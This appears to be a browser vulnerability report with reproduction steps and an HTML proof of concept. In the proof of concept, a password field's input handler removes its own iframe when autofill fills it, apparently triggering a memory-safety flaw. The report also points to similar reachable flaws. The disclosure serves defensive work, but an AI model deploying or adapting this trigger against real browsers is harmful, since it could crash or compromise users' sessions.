Steps to reproduce:
<ol>
    <li> Enable auto-fill if not already enabled (autofill is usually enabled by default) - chrome://settings, Advanced, Password and forms, "Offer to save your web passwords"
    <li> Type some dummy password, e.g. "secret" and submit the form.
    <li> Chrome asks to save the password, save it.
    <li> Refresh the page, and observe that the username + password is autofilled.
    <li> Click anywhere to complete the autofill and notify the page (or refocus the window).
    <li> Surprise...
</ol>

<iframe srcdoc="
    <script>
    var lastInputLength = 0;
    </script>
    <form>
        <input name=username value=Dummy>
        <input name='password'
            type=password
            oninput='
            if (Math.abs(this.value.length - lastInputLength) > 1) {
                /* More than 1 character changed - Assume that the change is caused by autofill. */
                frameElement.remove();
            }
            lastInputLength = this.value.length;
        '>
        <input type=submit>
    </form>
"></iframe>

<p>
This is just one instance of the vulnerability. There are several similar flaws in the autofill / password completion logic, just look up the callers of <code>WebFormControlElement::setValue</code> with <code>sendEvents = true</code> (second parameter).
